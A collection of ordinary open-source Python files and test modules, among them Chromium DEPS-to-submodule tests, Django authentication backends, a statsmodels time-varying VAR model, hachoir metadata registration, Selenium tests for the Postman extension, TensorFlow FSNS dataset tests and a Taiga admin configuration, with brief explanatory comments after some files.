self.assertEqual(expected, deps2submodules.CollateDeps(arg))
def testSrcPrefixStrip(self):
arg = ({
'src/in_src': 'http://git.chromium.org/src.git@f00bad',
'not_in_src/foo': 'http://other.git.something/main.git@123456',
}, {}) # No OS-specific DEPS.
expected = {
'in_src': [['all'], 'http://git.chromium.org/src.git', 'f00bad'],
'not_in_src/foo':
[['all'], 'http://other.git.something/main.git', '123456'],
}
self.assertEqual(expected, deps2submodules.CollateDeps(arg))
def testOSDeps(self):
arg = ({
'src/hotp': 'http://hmac.org/hotp.git@7fffffff',
}, {
'linux': {
'src/third_party/selinux': 'http://kernel.org/selinux.git@abc123',
'src/multios': 'http://git.chromium.org/multi.git@000005',
},
'mac': {
'src/third_party/security':
'http://opensource.apple.com/security.git@def456',
},
'win': {
'src/multios': 'http://git.chromium.org/multi.git@000005',
},
})
expected = {
'hotp': [['all'], 'http://hmac.org/hotp.git', '7fffffff'],
'third_party/selinux':
[['linux'], 'http://kernel.org/selinux.git', 'abc123'],
'third_party/security':
[['mac'], 'http://opensource.apple.com/security.git', 'def456'],
'multios':
[['win', 'linux'], 'http://git.chromium.org/multi.git', '000005'],
}
self.assertEqual(expected, deps2submodules.CollateDeps(arg))
def testOSDepsWithNone(self):
arg = ({
'src/skia': 'http://git.chromium.org/skia.git@abc123',
'src/aura': 'http://git.chromium.org/aura.git',
}, {
'ios': {
'src/skia': None,
'src/apple': 'http://git.chromium.org/apple.git@def456',
}
})
expected = {
'skia': [['all'], 'http://git.chromium.org/skia.git', 'abc123'],
'aura': [['all'], 'http://git.chromium.org/aura.git', ''],
'apple': [['ios'], 'http://git.chromium.org/apple.git', 'def456'],
}
self.assertEqual(expected, deps2submodules.CollateDeps(arg))
if __name__ == '__main__':
unittest.main()
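The tests above pin down the contract `deps2submodules.CollateDeps` must honor: strip the `src/` prefix, split `url@revision` specs (an unpinned spec gets an empty revision), tag common deps with `['all']`, and skip OS-specific entries set to `None`. A from-scratch sketch satisfying the non-OS-specific cases — the real implementation in deps2git may differ:

```python
def collate_deps_sketch(deps_tuple):
    deps, deps_os = deps_tuple

    def strip_src(path):
        # Submodule paths are relative to src/; anything else keeps its prefix.
        return path[len('src/'):] if path.startswith('src/') else path

    def split_spec(spec):
        # "url@revision" -> (url, revision); a missing pin becomes ''.
        if '@' in spec:
            return tuple(spec.rsplit('@', 1))
        return spec, ''

    submodules = {}
    for path, spec in deps.items():
        url, rev = split_spec(spec)
        submodules[strip_src(path)] = [['all'], url, rev]
    for os_name, os_deps in deps_os.items():
        for path, spec in os_deps.items():
            if spec is None:
                continue  # None means "excluded on this OS"
            url, rev = split_spec(spec)
            key = strip_src(path)
            if key in submodules and submodules[key][0] != ['all']:
                submodules[key][0].append(os_name)
            else:
                submodules[key] = [[os_name], url, rev]
    return submodules
```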
| bsd-3-clause |
egenerat/flight-manager | django/contrib/auth/backends.py | 9 | 4446 | from django.db import connection
from django.contrib.auth.models import User, Permission
class ModelBackend(object):
"""
Authenticates against django.contrib.auth.models.User.
"""
supports_object_permissions = False
supports_anonymous_user = True
# TODO: Model, login attribute name and password attribute name should be
# configurable.
def authenticate(self, username=None, password=None):
try:
user = User.objects.get(username=username)
if user.check_password(password):
return user
except User.DoesNotExist:
return None
def get_group_permissions(self, user_obj):
"""
Returns a set of permission strings that this user has through his/her
groups.
"""
if not hasattr(user_obj, '_group_perm_cache'):
perms = Permission.objects.filter(group__user=user_obj
).values_list('content_type__app_label', 'codename'
).order_by()
user_obj._group_perm_cache = set(["%s.%s" % (ct, name) for ct, name in perms])
return user_obj._group_perm_cache
def get_all_permissions(self, user_obj):
if user_obj.is_anonymous():
return set()
if not hasattr(user_obj, '_perm_cache'):
user_obj._perm_cache = set([u"%s.%s" % (p.content_type.app_label, p.codename) for p in user_obj.user_permissions.select_related()])
user_obj._perm_cache.update(self.get_group_permissions(user_obj))
return user_obj._perm_cache
def has_perm(self, user_obj, perm):
return perm in self.get_all_permissions(user_obj)
def has_module_perms(self, user_obj, app_label):
"""
Returns True if user_obj has any permissions in the given app_label.
"""
for perm in self.get_all_permissions(user_obj):
if perm[:perm.index('.')] == app_label:
return True
return False
def get_user(self, user_id):
try:
return User.objects.get(pk=user_id)
except User.DoesNotExist:
return None
class RemoteUserBackend(ModelBackend):
"""
This backend is to be used in conjunction with the ``RemoteUserMiddleware``
found in the middleware module of this package, and is used when the server
is handling authentication outside of Django.
By default, the ``authenticate`` method creates ``User`` objects for
usernames that don't already exist in the database. Subclasses can disable
this behavior by setting the ``create_unknown_user`` attribute to
``False``.
"""
# Create a User object if not already in the database?
create_unknown_user = True
def authenticate(self, remote_user):
"""
The username passed as ``remote_user`` is considered trusted. This
method simply returns the ``User`` object with the given username,
creating a new ``User`` object if ``create_unknown_user`` is ``True``.
Returns None if ``create_unknown_user`` is ``False`` and a ``User``
object with the given username is not found in the database.
"""
if not remote_user:
return
user = None
username = self.clean_username(remote_user)
# Note that this could be accomplished in one try-except clause, but
# instead we use get_or_create when creating unknown users since it has
# built-in safeguards for multiple threads.
if self.create_unknown_user:
user, created = User.objects.get_or_create(username=username)
if created:
user = self.configure_user(user)
else:
try:
user = User.objects.get(username=username)
except User.DoesNotExist:
pass
return user
def clean_username(self, username):
"""
Performs any cleaning on the "username" prior to using it to get or
create the user object. Returns the cleaned username.
By default, returns the username unchanged.
"""
return username
def configure_user(self, user):
"""
Configures a user after creation and returns the updated user.
By default, returns the user unmodified.
"""
return user
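`has_module_perms` above works because permission strings follow the `"app_label.codename"` convention, so membership in an app reduces to comparing the prefix before the first dot. A standalone sketch of that check (the function name is illustrative, not a Django API):

```python
def has_module_perms_sketch(all_permissions, app_label):
    # Mirrors ModelBackend.has_module_perms: permission strings are
    # "app_label.codename", so compare the prefix before the first dot.
    for perm in all_permissions:
        if perm[:perm.index('.')] == app_label:
            return True
    return False
```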
| mit |
yl565/statsmodels | statsmodels/tsa/vector_ar/dynamic.py | 4 | 10037 | # pylint: disable=W0201
from statsmodels.compat.python import iteritems, string_types, range
import numpy as np
from statsmodels.tools.decorators import cache_readonly
import pandas as pd
from . import var_model as _model
from . import util
from . import plotting
FULL_SAMPLE = 0
ROLLING = 1
EXPANDING = 2
def _get_window_type(window_type):
if window_type in (FULL_SAMPLE, ROLLING, EXPANDING):
return window_type
elif isinstance(window_type, string_types):
window_type_up = window_type.upper()
if window_type_up in ('FULL SAMPLE', 'FULL_SAMPLE'):
return FULL_SAMPLE
elif window_type_up == 'ROLLING':
return ROLLING
elif window_type_up == 'EXPANDING':
return EXPANDING
raise ValueError('Unrecognized window type: %s' % window_type)
class DynamicVAR(object):
"""
Estimates time-varying vector autoregression (VAR(p)) using
equation-by-equation least squares
Parameters
----------
data : pandas.DataFrame
lag_order : int, default 1
window : int
window_type : {'expanding', 'rolling'}
min_periods : int or None
Minimum number of observations to require in window, defaults to window
size if None specified
trend : {'c', 'nc', 'ct', 'ctt'}
TODO
Returns
-------
**Attributes**:
coefs : Panel
items : coefficient names
major_axis : dates
minor_axis : VAR equation names
"""
def __init__(self, data, lag_order=1, window=None, window_type='expanding',
trend='c', min_periods=None):
self.lag_order = lag_order
self.names = list(data.columns)
self.neqs = len(self.names)
self._y_orig = data
# TODO: deal with trend
self._x_orig = _make_lag_matrix(data, lag_order)
self._x_orig['intercept'] = 1
(self.y, self.x, self.x_filtered, self._index,
self._time_has_obs) = _filter_data(self._y_orig, self._x_orig)
self.lag_order = lag_order
self.trendorder = util.get_trendorder(trend)
self._set_window(window_type, window, min_periods)
def _set_window(self, window_type, window, min_periods):
self._window_type = _get_window_type(window_type)
if self._is_rolling:
if window is None:
raise ValueError('Must pass window when doing rolling '
'regression')
if min_periods is None:
min_periods = window
else:
window = len(self.x)
if min_periods is None:
min_periods = 1
self._window = int(window)
self._min_periods = min_periods
@cache_readonly
def T(self):
"""
Number of time periods in results
"""
return len(self.result_index)
@property
def nobs(self):
# Stub, do I need this?
data = dict((eq, r.nobs) for eq, r in iteritems(self.equations))
return pd.DataFrame(data)
@cache_readonly
def equations(self):
eqs = {}
for col, ts in iteritems(self.y):
# TODO: Remove in favor of statsmodels implementation
model = pd.ols(y=ts, x=self.x, window=self._window,
window_type=self._window_type,
min_periods=self._min_periods)
eqs[col] = model
return eqs
@cache_readonly
def coefs(self):
"""
Return dynamic regression coefficients as Panel
"""
data = {}
for eq, result in iteritems(self.equations):
data[eq] = result.beta
panel = pd.Panel.fromDict(data)
# Coefficient names become items
return panel.swapaxes('items', 'minor')
@property
def result_index(self):
return self.coefs.major_axis
@cache_readonly
def _coefs_raw(self):
"""
Reshape coefficients to be more amenable to dynamic calculations
Returns
-------
coefs : (time_periods x lag_order x neqs x neqs)
"""
coef_panel = self.coefs.copy()
del coef_panel['intercept']
coef_values = coef_panel.swapaxes('items', 'major').values
coef_values = coef_values.reshape((len(coef_values),
self.lag_order,
self.neqs, self.neqs))
return coef_values
@cache_readonly
def _intercepts_raw(self):
"""
Similar to _coefs_raw, return intercept values in easy-to-use matrix
form
Returns
-------
intercepts : (T x K)
"""
return self.coefs['intercept'].values
@cache_readonly
def resid(self):
data = {}
for eq, result in iteritems(self.equations):
data[eq] = result.resid
return pd.DataFrame(data)
def forecast(self, steps=1):
"""
Produce dynamic forecast
Parameters
----------
steps : int, default 1
Number of steps ahead to forecast
Returns
-------
forecasts : pandas.DataFrame
"""
output = np.empty((self.T - steps, self.neqs))
y_values = self.y.values
y_index_map = dict((d, idx) for idx, d in enumerate(self.y.index))
result_index_map = dict((d, idx) for idx, d in enumerate(self.result_index))
coefs = self._coefs_raw
intercepts = self._intercepts_raw
# can only produce this many forecasts
forc_index = self.result_index[steps:]
for i, date in enumerate(forc_index):
# TODO: check that this does the right thing in weird cases...
idx = y_index_map[date] - steps
result_idx = result_index_map[date] - steps
y_slice = y_values[:idx]
forcs = _model.forecast(y_slice, coefs[result_idx],
intercepts[result_idx], steps)
output[i] = forcs[-1]
return pd.DataFrame(output, index=forc_index, columns=self.names)
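`forecast()` defers the actual h-step recursion to `_model.forecast`, which iterates the VAR(p) law of motion: each new observation is the intercept plus the lag matrices applied to the most recent p values. A dependency-free sketch of that recursion — an illustration, not the statsmodels implementation:

```python
def var_forecast_sketch(y, coefs, intercept, steps):
    # y: observed K-vectors, most recent last.
    # coefs: [lag][K][K] matrices; lag 0 multiplies y_t, lag 1 multiplies
    # y_{t-1}, and so on. intercept: K-vector.
    history = [list(v) for v in y]
    n_eq = len(intercept)
    n_lags = len(coefs)
    forecasts = []
    for _ in range(steps):
        new = list(intercept)
        for lag in range(n_lags):
            prev = history[-(lag + 1)]
            for i in range(n_eq):
                for j in range(n_eq):
                    new[i] += coefs[lag][i][j] * prev[j]
        history.append(new)  # dynamic forecast: feed forecasts back in
        forecasts.append(new)
    return forecasts
```

For a scalar AR(1) with coefficient 0.5 and zero intercept, starting from 1.0, the two-step path is 0.5 then 0.25.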
def plot_forecast(self, steps=1, figsize=(10, 10)):
"""
Plot h-step ahead forecasts against actual realizations of time
series. Note that forecasts are lined up with their respective
realizations.
Parameters
----------
steps : int, default 1
Number of steps ahead to forecast and overlay on the realized series
"""
import matplotlib.pyplot as plt
fig, axes = plt.subplots(figsize=figsize, nrows=self.neqs,
sharex=True)
forc = self.forecast(steps=steps)
dates = forc.index
y_overlay = self.y.reindex(dates)
for i, col in enumerate(forc.columns):
ax = axes[i]
y_ts = y_overlay[col]
forc_ts = forc[col]
y_handle = ax.plot(dates, y_ts.values, 'k.', ms=2)
forc_handle = ax.plot(dates, forc_ts.values, 'k-')
lines = (y_handle[0], forc_handle[0])
labels = ('Y', 'Forecast')
fig.legend(lines, labels)
fig.autofmt_xdate()
fig.suptitle('Dynamic %d-step forecast' % steps)
# pretty things up a bit
plotting.adjust_subplots(bottom=0.15, left=0.10)
plt.draw_if_interactive()
@property
def _is_rolling(self):
return self._window_type == ROLLING
@cache_readonly
def r2(self):
"""Returns the r-squared values."""
data = dict((eq, r.r2) for eq, r in iteritems(self.equations))
return pd.DataFrame(data)
class DynamicPanelVAR(DynamicVAR):
"""
Dynamic (time-varying) panel vector autoregression using panel ordinary
least squares
Parameters
----------
"""
def __init__(self, data, lag_order=1, window=None, window_type='expanding',
trend='c', min_periods=None):
self.lag_order = lag_order
self.neqs = len(data.columns)
self._y_orig = data
# TODO: deal with trend
self._x_orig = _make_lag_matrix(data, lag_order)
self._x_orig['intercept'] = 1
(self.y, self.x, self.x_filtered, self._index,
self._time_has_obs) = _filter_data(self._y_orig, self._x_orig)
self.lag_order = lag_order
self.trendorder = util.get_trendorder(trend)
self._set_window(window_type, window, min_periods)
def _filter_data(lhs, rhs):
"""
Data filtering routine for dynamic VAR
lhs : DataFrame
original data
rhs : DataFrame
lagged variables
Returns
-------
"""
def _has_all_columns(df):
return np.isfinite(df.values).sum(1) == len(df.columns)
rhs_valid = _has_all_columns(rhs)
if not rhs_valid.all():
pre_filtered_rhs = rhs[rhs_valid]
else:
pre_filtered_rhs = rhs
index = lhs.index.union(rhs.index)
if not index.equals(rhs.index) or not index.equals(lhs.index):
rhs = rhs.reindex(index)
lhs = lhs.reindex(index)
rhs_valid = _has_all_columns(rhs)
lhs_valid = _has_all_columns(lhs)
valid = rhs_valid & lhs_valid
if not valid.all():
filt_index = rhs.index[valid]
filtered_rhs = rhs.reindex(filt_index)
filtered_lhs = lhs.reindex(filt_index)
else:
filtered_rhs, filtered_lhs = rhs, lhs
return filtered_lhs, filtered_rhs, pre_filtered_rhs, index, valid
def _make_lag_matrix(x, lags):
data = {}
columns = []
for i in range(1, 1 + lags):
lagstr = 'L%d.'% i
lag = x.shift(i).rename(columns=lambda c: lagstr + c)
data.update(lag._series)
columns.extend(lag.columns)
return pd.DataFrame(data, columns=columns)
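`_make_lag_matrix` builds one column per lag by shifting the data down `i` rows, so the first `i` entries of column `L<i>.<name>` are missing. A dependency-free sketch of what each `x.shift(i)` contributes (helper names are illustrative):

```python
def lagged(series, i):
    # Equivalent of pandas shift(i) on a plain list: the first i slots
    # become missing (None) and the tail is dropped to keep the length.
    n = len(series)
    return [None] * min(i, n) + list(series[:max(n - i, 0)])

def make_lag_columns(series, lags):
    # One column per lag, named like _make_lag_matrix ('L1.', 'L2.', ...);
    # 'y' stands in for the original column name.
    return dict(('L%d.y' % i, lagged(series, i)) for i in range(1, lags + 1))
```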
class Equation(object):
"""
Stub, estimate one equation
"""
def __init__(self, y, x):
pass
if __name__ == '__main__':
import pandas.util.testing as ptest
ptest.N = 500
data = ptest.makeTimeDataFrame().cumsum(0)
var = DynamicVAR(data, lag_order=2, window_type='expanding')
var2 = DynamicVAR(data, lag_order=2, window=10,
window_type='rolling')
| bsd-3-clause |
dgarciam/Sick-Beard | lib/hachoir_metadata/register.py | 90 | 7003 | from lib.hachoir_core.i18n import _
from lib.hachoir_core.tools import (
humanDuration, humanBitRate,
humanFrequency, humanBitSize, humanFilesize,
humanDatetime)
from lib.hachoir_core.language import Language
from lib.hachoir_metadata.filter import Filter, NumberFilter, DATETIME_FILTER
from datetime import date, datetime, timedelta
from lib.hachoir_metadata.formatter import (
humanAudioChannel, humanFrameRate, humanComprRate, humanAltitude,
humanPixelSize, humanDPI)
from lib.hachoir_metadata.setter import (
setDatetime, setTrackNumber, setTrackTotal, setLanguage)
from lib.hachoir_metadata.metadata_item import Data
MIN_SAMPLE_RATE = 1000 # 1 kHz
MAX_SAMPLE_RATE = 192000 # 192 kHz
MAX_NB_CHANNEL = 8 # 8 channels
MAX_WIDTH = 20000 # 20 000 pixels
MAX_BIT_RATE = 500 * 1024 * 1024 # 500 Mbit/s
MAX_HEIGHT = MAX_WIDTH
MAX_DPI_WIDTH = 10000
MAX_DPI_HEIGHT = MAX_DPI_WIDTH
MAX_NB_COLOR = 2 ** 24 # 16 million of color
MAX_BITS_PER_PIXEL = 256 # 256 bits/pixel
MAX_FRAME_RATE = 150 # 150 frame/sec
MAX_NB_PAGE = 20000
MAX_COMPR_RATE = 1000.0
MIN_COMPR_RATE = 0.001
MAX_TRACK = 999
DURATION_FILTER = Filter(timedelta,
timedelta(milliseconds=1),
timedelta(days=365))
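`Filter(timedelta, low, high)` as used above accepts a value only when it has the declared type and falls inside the range; a standalone sketch of `DURATION_FILTER` under that assumed inclusive-range semantics (the function name is illustrative, not hachoir API):

```python
from datetime import timedelta

def duration_filter_sketch(value,
                           low=timedelta(milliseconds=1),
                           high=timedelta(days=365)):
    # Accept only timedeltas within [1 ms, 365 days], as DURATION_FILTER does;
    # the isinstance check short-circuits before any cross-type comparison.
    return isinstance(value, timedelta) and low <= value <= high
```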
def registerAllItems(meta):
meta.register(Data("title", 100, _("Title"), type=unicode))
meta.register(Data("artist", 101, _("Artist"), type=unicode))
meta.register(Data("author", 102, _("Author"), type=unicode))
meta.register(Data("music_composer", 103, _("Music composer"), type=unicode))
meta.register(Data("album", 200, _("Album"), type=unicode))
meta.register(Data("duration", 201, _("Duration"), # integer in milliseconde
type=timedelta, text_handler=humanDuration, filter=DURATION_FILTER))
meta.register(Data("nb_page", 202, _("Nb page"), filter=NumberFilter(1, MAX_NB_PAGE)))
meta.register(Data("music_genre", 203, _("Music genre"), type=unicode))
meta.register(Data("language", 204, _("Language"), conversion=setLanguage, type=Language))
meta.register(Data("track_number", 205, _("Track number"), conversion=setTrackNumber,
filter=NumberFilter(1, MAX_TRACK), type=(int, long)))
meta.register(Data("track_total", 206, _("Track total"), conversion=setTrackTotal,
filter=NumberFilter(1, MAX_TRACK), type=(int, long)))
meta.register(Data("organization", 210, _("Organization"), type=unicode))
meta.register(Data("version", 220, _("Version")))
meta.register(Data("width", 301, _("Image width"), filter=NumberFilter(1, MAX_WIDTH), type=(int, long), text_handler=humanPixelSize))
meta.register(Data("height", 302, _("Image height"), filter=NumberFilter(1, MAX_HEIGHT), type=(int, long), text_handler=humanPixelSize))
meta.register(Data("nb_channel", 303, _("Channel"), text_handler=humanAudioChannel, filter=NumberFilter(1, MAX_NB_CHANNEL), type=(int, long)))
meta.register(Data("sample_rate", 304, _("Sample rate"), text_handler=humanFrequency, filter=NumberFilter(MIN_SAMPLE_RATE, MAX_SAMPLE_RATE), type=(int, long, float)))
meta.register(Data("bits_per_sample", 305, _("Bits/sample"), text_handler=humanBitSize, filter=NumberFilter(1, 64), type=(int, long)))
meta.register(Data("image_orientation", 306, _("Image orientation")))
meta.register(Data("nb_colors", 307, _("Number of colors"), filter=NumberFilter(1, MAX_NB_COLOR), type=(int, long)))
meta.register(Data("bits_per_pixel", 308, _("Bits/pixel"), filter=NumberFilter(1, MAX_BITS_PER_PIXEL), type=(int, long)))
meta.register(Data("filename", 309, _("File name"), type=unicode))
meta.register(Data("file_size", 310, _("File size"), text_handler=humanFilesize, type=(int, long)))
meta.register(Data("pixel_format", 311, _("Pixel format")))
meta.register(Data("compr_size", 312, _("Compressed file size"), text_handler=humanFilesize, type=(int, long)))
meta.register(Data("compr_rate", 313, _("Compression rate"), text_handler=humanComprRate, filter=NumberFilter(MIN_COMPR_RATE, MAX_COMPR_RATE), type=(int, long, float)))
meta.register(Data("width_dpi", 320, _("Image DPI width"), filter=NumberFilter(1, MAX_DPI_WIDTH), type=(int, long), text_handler=humanDPI))
meta.register(Data("height_dpi", 321, _("Image DPI height"), filter=NumberFilter(1, MAX_DPI_HEIGHT), type=(int, long), text_handler=humanDPI))
meta.register(Data("file_attr", 400, _("File attributes")))
meta.register(Data("file_type", 401, _("File type")))
meta.register(Data("subtitle_author", 402, _("Subtitle author"), type=unicode))
meta.register(Data("creation_date", 500, _("Creation date"), text_handler=humanDatetime,
filter=DATETIME_FILTER, type=(datetime, date), conversion=setDatetime))
meta.register(Data("last_modification", 501, _("Last modification"), text_handler=humanDatetime,
filter=DATETIME_FILTER, type=(datetime, date), conversion=setDatetime))
meta.register(Data("latitude", 510, _("Latitude"), type=float))
meta.register(Data("longitude", 511, _("Longitude"), type=float))
meta.register(Data("altitude", 512, _("Altitude"), type=float, text_handler=humanAltitude))
meta.register(Data("location", 530, _("Location"), type=unicode))
meta.register(Data("city", 531, _("City"), type=unicode))
meta.register(Data("country", 532, _("Country"), type=unicode))
meta.register(Data("charset", 540, _("Charset"), type=unicode))
meta.register(Data("font_weight", 550, _("Font weight")))
meta.register(Data("camera_aperture", 520, _("Camera aperture")))
meta.register(Data("camera_focal", 521, _("Camera focal")))
meta.register(Data("camera_exposure", 522, _("Camera exposure")))
meta.register(Data("camera_brightness", 523, _("Camera brightness")))
meta.register(Data("camera_model", 524, _("Camera model"), type=unicode))
meta.register(Data("camera_manufacturer", 525, _("Camera manufacturer"), type=unicode))
meta.register(Data("compression", 600, _("Compression")))
meta.register(Data("copyright", 601, _("Copyright"), type=unicode))
meta.register(Data("url", 602, _("URL"), type=unicode))
meta.register(Data("frame_rate", 603, _("Frame rate"), text_handler=humanFrameRate,
filter=NumberFilter(1, MAX_FRAME_RATE), type=(int, long, float)))
meta.register(Data("bit_rate", 604, _("Bit rate"), text_handler=humanBitRate,
filter=NumberFilter(1, MAX_BIT_RATE), type=(int, long, float)))
meta.register(Data("aspect_ratio", 605, _("Aspect ratio"), type=(int, long, float)))
meta.register(Data("os", 900, _("OS"), type=unicode))
meta.register(Data("producer", 901, _("Producer"), type=unicode))
meta.register(Data("comment", 902, _("Comment"), type=unicode))
meta.register(Data("format_version", 950, _("Format version"), type=unicode))
meta.register(Data("mime_type", 951, _("MIME type"), type=unicode))
meta.register(Data("endian", 952, _("Endianness"), type=unicode))
| gpl-3.0 |
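The block above maps each metadata attribute to a numeric key via `meta.register()`. A minimal registry sketch (names hypothetical, not the library's API) showing the pattern, with a guard so a later entry cannot reuse an earlier entry's key:

```python
class DuplicateKeyError(Exception):
    pass

class Registry(object):
    """Hypothetical keyed registry mirroring the meta.register() pattern above."""
    def __init__(self):
        self._by_key = {}
        self._by_name = {}

    def register(self, name, key):
        # Reject duplicate numeric keys so a later entry cannot shadow
        # (or tie with) an earlier one.
        if key in self._by_key:
            raise DuplicateKeyError("key %d already used by %r"
                                    % (key, self._by_key[key]))
        self._by_key[key] = name
        self._by_name[name] = key

reg = Registry()
reg.register("latitude", 510)
reg.register("longitude", 511)
reg.register("altitude", 512)
try:
    reg.register("depth", 511)   # same key as longitude
except DuplicateKeyError:
    print("duplicate key rejected")
```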
nvoron23/POSTMan-Chrome-Extension | tests/selenium/pmtests/postman_tests.py | 98 | 3507 | from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.select import Select
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
from colorama import init
from colorama import Fore, Back, Style
import selenium.webdriver.chrome.service as service
import inspect
import time
import traceback
class PostmanTests:
def __init__(self):
init()
s = service.Service('/Users/asthana/Documents/www/chromedriver') # Optional argument, if not specified will search path.
s.start()
capabilities = {'chrome.switches': ["--load-extension=/Users/asthana/Documents/www/postman/POSTMan-Chrome-Extension/chrome"]}
browser = webdriver.Remote(s.service_url, capabilities)
self.s = s
self.browser = browser
self.load_postman()
self.init_test_title()
self.init_test_indexed_db()
def run(self):
print "\nRunning"
print "---------------"
methods = inspect.getmembers(self, predicate=inspect.ismethod)
allms = []
for method in methods:
name = method[0]
f = method[1]
if name.find("test") == 0:
order = int(name.split("_")[1])
m = {
"order": order,
"method": method[1],
"name": method[0]
}
allms.append(m)
ordered = sorted(allms, key=lambda k: k["order"])
for m in ordered:
try:
result = m["method"]()
except Exception as e:
result = False
print traceback.format_exc()
if result is True:
print Fore.WHITE + Back.GREEN + "[PASSED]" + Fore.RESET + Back.RESET + " %s" % m["name"]
else:
print Fore.WHITE + Back.RED + "[FAILED]" + Fore.RESET + Back.RESET + " %s" % m["name"]
self.browser.quit()
def load_postman(self):
self.browser.get('chrome-extension://ljkndjhokjnonidfaggiacifldihhjmg/index.html')
def set_url_field(self, browser, val):
url_field = browser.find_element_by_id("url")
url_field.clear()
url_field.send_keys(val)
def get_codemirror_value(self, browser):
w = WebDriverWait(browser, 10)
w.until(lambda browser: browser.find_element_by_css_selector("#response-success-container").get_attribute("style").find("block") > 0)
code_data_textarea = browser.find_element_by_css_selector("#response-as-code .CodeMirror")
code_data_value = browser.execute_script("return arguments[0].innerHTML", code_data_textarea)
return code_data_value
def set_code_mirror_raw_value(self, value):
code_data_value = self.browser.execute_script("return pm.request.body.loadRawData(arguments[0])", value)
def init_test_title(self):
assert "Postman" in self.browser.title
def init_test_indexed_db(self):
w = WebDriverWait(self.browser, 10)
w.until(lambda driver: self.browser.find_element_by_css_selector("#sidebar-section-history .empty-message"))
print "\nPostman loaded successfully."
return True
def reset_request(self):
reset_button = self.browser.find_element_by_id("request-actions-reset")
reset_button.click()
time.sleep(0.5)
| apache-2.0 |
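The `run()` loop above discovers methods whose names start with `test` and executes them in the numeric order embedded in the name (`test_<N>_...`), not discovery order. That ordering scheme can be sketched in isolation (method names here are illustrative):

```python
# Orders test method names by the number after the first underscore,
# mirroring the sort in PostmanTests.run() above (slightly stricter:
# it requires a "test_" prefix rather than just "test").
def ordered_tests(names):
    tests = [n for n in names if n.startswith("test_")]
    return sorted(tests, key=lambda n: int(n.split("_")[1]))

print(ordered_tests(["test_10_history", "test_2_get", "helper", "test_1_title"]))
# -> ['test_1_title', 'test_2_get', 'test_10_history']
```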
tensorflow/models | research/attention_ocr/python/datasets/fsns_test.py | 1 | 3450 | # Copyright 2017 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for FSNS datasets module."""
import collections
import os
import tensorflow as tf
from tensorflow.contrib import slim
from datasets import fsns
from datasets import unittest_utils
from tensorflow.compat.v1 import flags
FLAGS = flags.FLAGS
def get_test_split():
config = fsns.DEFAULT_CONFIG.copy()
config['splits'] = {'test': {'size': 5, 'pattern': 'fsns-00000-of-00001'}}
return fsns.get_split('test', dataset_dir(), config)
def dataset_dir():
return os.path.join(os.path.dirname(__file__), 'testdata/fsns')
class FsnsTest(tf.test.TestCase):
def test_decodes_example_proto(self):
expected_label = range(37)
expected_image, encoded = unittest_utils.create_random_image(
'PNG', shape=(150, 600, 3))
serialized = unittest_utils.create_serialized_example({
'image/encoded': [encoded],
'image/format': [b'PNG'],
'image/class':
expected_label,
'image/unpadded_class':
range(10),
'image/text': [b'Raw text'],
'image/orig_width': [150],
'image/width': [600]
})
decoder = fsns.get_split('train', dataset_dir()).decoder
with self.test_session() as sess:
data_tuple = collections.namedtuple('DecodedData', decoder.list_items())
data = sess.run(data_tuple(*decoder.decode(serialized)))
self.assertAllEqual(expected_image, data.image)
self.assertAllEqual(expected_label, data.label)
self.assertEqual([b'Raw text'], data.text)
self.assertEqual([1], data.num_of_views)
def test_label_has_shape_defined(self):
serialized = 'fake'
decoder = fsns.get_split('train', dataset_dir()).decoder
[label_tf] = decoder.decode(serialized, ['label'])
self.assertEqual(label_tf.get_shape().dims[0], 37)
def test_dataset_tuple_has_all_extra_attributes(self):
dataset = fsns.get_split('train', dataset_dir())
self.assertTrue(dataset.charset)
self.assertTrue(dataset.num_char_classes)
self.assertTrue(dataset.num_of_views)
self.assertTrue(dataset.max_sequence_length)
self.assertTrue(dataset.null_code)
def test_can_use_the_test_data(self):
batch_size = 1
dataset = get_test_split()
provider = slim.dataset_data_provider.DatasetDataProvider(
dataset,
shuffle=True,
common_queue_capacity=2 * batch_size,
common_queue_min=batch_size)
image_tf, label_tf = provider.get(['image', 'label'])
with self.test_session() as sess:
sess.run(tf.compat.v1.global_variables_initializer())
with slim.queues.QueueRunners(sess):
image_np, label_np = sess.run([image_tf, label_tf])
self.assertEqual((150, 600, 3), image_np.shape)
self.assertEqual((37, ), label_np.shape)
if __name__ == '__main__':
tf.test.main()
| apache-2.0 |
rajiteh/taiga-back | taiga/projects/attachments/admin.py | 21 | 1362 | # Copyright (C) 2014 Andrey Antukh <niwi@niwi.be>
# Copyright (C) 2014 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014 David Barragán <bameda@dbarragan.com>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.contrib import admin
from django.contrib.contenttypes import generic
from . import models
class AttachmentAdmin(admin.ModelAdmin):
list_display = ["id", "project", "attached_file", "owner", "content_type", "content_object"]
list_display_links = ["id", "attached_file",]
list_filter = ["project", "content_type"]
class AttachmentInline(generic.GenericTabularInline):
model = models.Attachment
fields = ("attached_file", "owner")
extra = 0
admin.site.register(models.Attachment, AttachmentAdmin)
| agpl-3.0 |
mikehankey/fireball_camera | read_frames_fast-mike.py | 1 | 1368 | #!/usr/bin/python3
import numpy as np
from pathlib import Path
import os
import requests
from collections import deque
import multiprocessing
from amscommon import read_config
import datetime
import cv2
import iproc
import time
import syslog
import sys
MORPH_KERNEL = np.ones((10, 10), np.uint8)
def main(orig_video_file):
pipe_parent, pipe_child = multiprocessing.Pipe()
man = multiprocessing.Manager()
shared_dict = man.dict()
shared_dict['done'] = 0
cam_process = multiprocessing.Process(target=cam_loop,args=(pipe_parent, shared_dict, orig_video_file))
cam_process.start()
